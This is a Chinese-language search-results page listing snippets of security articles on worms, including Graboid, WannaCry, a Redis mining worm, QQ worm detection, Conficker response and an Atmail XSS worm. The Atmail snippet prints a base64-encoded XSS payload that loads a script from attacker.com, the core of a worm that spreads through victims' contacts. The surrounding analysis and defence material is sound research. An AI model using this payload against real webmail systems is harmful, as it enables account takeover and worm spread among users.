首页
学习
活动
专区
工具
TVP
发布

Graboid蠕虫分析

研究人员发现了名为Graboid的新型加密劫持蠕虫,该蠕虫已传播到2,000多个不安全的Docker主机。...曾经发生过以蠕虫病毒形式传播加密劫持恶意软件的事件,但这是第一次看到使用Docker Engine中的容器传播的加密劫持蠕虫。...该恶意软件“ Graboid”在容器内部进行蠕虫传播和加密劫持。它在每次迭代中随机选择三个目标,在第一个目标上安装蠕虫,在第二个目标上停止采矿,在第三个目标上启动采矿。...蠕虫模拟 为了更好地了解蠕虫的有效性及其整体挖掘能力,我们创建了一个简单的Python程序来模拟蠕虫。...总结 此劫持蠕虫不涉及复杂的策略、技术、传播过程,但该蠕虫可以定期从C2中提取新脚本,因此它可以轻松地将其自身重新用于勒索软件或任何恶意软件。

93940

勒索蠕虫爆发背后

有些人描述这起蠕虫爆发事件时,居然说是“比特币病毒肆虐,遭殃的是一篇篇毕业论文”。这样戏剧性的题目,显然抓住了不少读者的眼球。但是事实是否真的如此呢?...我看到很多其他操作系统的用户在留言里面幸灾乐祸,似乎用macOS或者Linux就高人一等。这种心态要不得。什么叫武器级的黑客工具?人家本来是用于战争的,现在用于平民,每个人都没有了绝对的安全。...不排除哪天有人愿意用macOS或者Linux练练手。到那时候许多人会欲哭无泪。毕竟人人知道Windows漏洞多,因此总会安装杀毒软件或者安全防御工具。...macOS和Linux用户,你们中间没有“裸奔”上网的受累举一下手。 你需要做的,是明白什么更重要。 比起操作系统,你的数据更重要。 如果所有的重要数据都有备份,你这次的损失其实并不大。...对这次的蠕虫爆发事件,你怎么看?有没有什么好的防范建议呢?欢迎留言,我们一起讨论。 ----

57140
您找到你想要的搜索结果了吗?
是的
没有找到

Linux Redis自动化挖矿感染蠕虫分析及安全建议

| 导语 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中...系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问题进行挖矿并且会利用...)判断是否Linux系统。...通过对脚本的解读,我们基本已经清楚整个蠕虫的行为和入侵流程,也就是我们开始所描述的流程。 ...r.xx.xx.o/l、tmp.xxxx Redis服务加固 导致入侵的主要原因是Redis未授权访问问题,所以如果要扼制入侵的入口,需要针对Redis服务进行加固,避免黑客通过该途径进行入侵植入挖矿蠕虫

2.2K40

QQ蠕虫的行为检测方法

作者 Nandisec 选题背景QQ蠕虫是一种利用QQ等腾讯公司相关产品进行传播的一种特殊蠕虫,该蠕虫的基本原理是利用了QQ帐户的快速登录机制,只要当前系统中有一个QQ帐户成功登录,就可以通过后台接口实现该帐户相关应用的快速登录而不需要再次输入帐户密码...登录后蠕虫可以访问QQ应用的各种网络接口,例如:通过接口实现加QQ好友、加入QQ群、发消息、发日志、发微博、上传群共享文件等操作,且完全不需要用户同意。借用这种技术,QQ蠕虫可以实现非常快速的传播。...这种蠕虫诞生于QQ体系之上,其影响和传播主要集中在国内地区,因此国外品牌的杀软对这类蠕虫识别和支持非常有限,国内的杀软品牌对该蠕虫检测也不是特别理想,从而导致了该QQ蠕虫的传播更加快速,影响范围更广。

80680

WannaCry 蠕虫详细分析

背景: 2017 年 5 月 12 日,WannaCry 蠕虫通过 MS17-010 漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其进行详细分析...WannaCry 木马利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载 WannaCry 木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散...2、蠕虫行为: 通过创建服务启动,每次开机都会自启动 从木马自身读取 MS17_010 漏洞利用代码,playload 分为 x86 和 x64 两个版本。...创建两个线程,分别扫描内网和外网的 IP,开始进程蠕虫传播感染。

3.2K01

Window应急响应(二):蠕虫病毒

0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序...常见的蠕虫病毒:熊猫烧香病毒 、冲击波/震荡波病毒、conficker病毒等。...确认服务器感染conficker蠕虫病毒,下载conficker蠕虫专杀工具对服务器进行清查,成功清楚病毒。 ?...大致的处理流程如下: 1、发现异常:出口防火墙、本地端口连接情况,主动向外网发起大量连接 2、病毒查杀:卡巴斯基全盘扫描,发现异常文件 3、确认病毒:使用多引擎在线病毒对该文件扫描,确认服务器感染conficker蠕虫病毒...4、病毒处理:使用conficker蠕虫专杀工具对服务器进行清查,成功清除病毒。

1.3K40

腾讯安全团队深入解析wannacry蠕虫病毒

作者:腾讯电脑管家 来源: http://www.freebuf.com/articles/system/134578.html 背景: 2017年5月12日,WannaCry蠕虫通过MS17-010...漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密,本文对其进行详细分析。...WannaCry木马利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散...2、蠕虫行为: 通过创建服务启动,每次开机都会自启动。 从木马自身读取MS17_010漏洞利用代码,playload分为x86和x64两个版本。...创建两个线程,分别扫描内网和外网的IP,开始进程蠕虫传播感染。 对公网随机ip地址445端口进行扫描感染。 对于局域网,则直接扫描当前计算机所在的网段进行感染。 感染过程,尝试连接445端口。

1.1K50

蠕虫病毒--互联网时代的瘟疫

其传播主要体现在以下两个方面: (1),系统漏洞 (2),电子邮件 蠕虫病毒采用的是互联网复制传播而不是插入PE格式文件 2,蠕虫的基本程序结构 传播模块:主要负责蠕虫病毒的传播。...4,蠕虫病毒的传播方式 (1)利用系统漏洞 系统漏洞蠕虫一般具备一个小型的溢出系统,它随机产生IP并尝试溢出,然后将自身复制过去。...正因为这样,邮件蠕虫才成了如今世界“虫害”的主要来源。 包含蠕虫的邮件---错误的MIME头部---解出的蠕虫程序---感染机器 靠邮件传播的蠕虫主要有SoBig,MyDoom,求职信等。...,但是蠕虫病毒完全不用。...(2)传统机房的日志或者行为记录工具是无法检测到蠕虫感染的,也就是说光从日志文件中是看不出有无蠕虫攻击,尽管更新系统补丁在一定程度上可以防御蠕虫感染,但如果是新型蠕虫病毒,病毒中使用了0Day漏洞,那么更新系统的补丁将会是没有作用的

1.1K10

Wannacry蠕虫勒索软件处置流程及方案

Wannacry蠕虫勒索软件处置流程及工具包 1、背景 5月12日晚,一款名为Wannacry 的蠕虫勒索软件袭击全球网络,这被认为是迄今为止最巨大的勒索交费活动,影响到近百个国家上千家企业及公共组织...该软件被认为是一种蠕虫变种(也被称为“Wannadecrypt0r”、“wannacryptor”或“ wcry”)。...蠕虫软件正是利用 SMB服务器漏洞,通过渗透到未打补丁的Windows计算机中,实现大规模迅速传播。 一旦你所在组织中一台计算机受攻击,蠕虫会迅速寻找其他有漏洞的电脑并发起攻击。...参考链接:http://www.freebuf.com/news/134512.html 2、处置流程 Wannacry蠕虫勒索软件处置流程及工具包(含离线补丁) https://pan.baidu.com...5、附录:个版本系统补丁包下载 Wannacry蠕虫勒索软件处置流程及工具包(含离线补丁) https://pan.baidu.com/s/1o8ludfk 离线升级包(长按复制在浏览器中打开):

1.5K70

【国庆快乐^^】如何在Atmail上构建XSS蠕虫

如何在Atmail上构建XSS蠕虫 这篇博客文章由高级安全分析师Zach Julian撰写; 你可以在Twitter上与他联系。 Atmail是云端和本地电子邮件托管的受欢迎的提供商。...最着名的XSS蠕虫病例在2005年影响了MySpace ,2014年的TweetDeck更新版本更新。 在这篇文章中,我将展示构建一个通过受害者联系人传播的XSS有效载荷的蠕虫测试。...构建蠕虫 找到可以用的的XSS向量后,下一步是创建一个可以传播我的电子邮件蠕虫xss payload 我写了一些JavaScript代码 分三步: 提取受害者的联系人列表 从atmail...aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw=='));//> 一切都搞定后,蠕虫已经开始运作了...下面这个视频演示了它的整个逻辑过程: atmail上的XSS蠕虫将有利于垃圾邮件发送者和其他恶意软件 谁将受益于操纵受害者发送的行为者 任意消息到他们的联系人列表。

79760
领券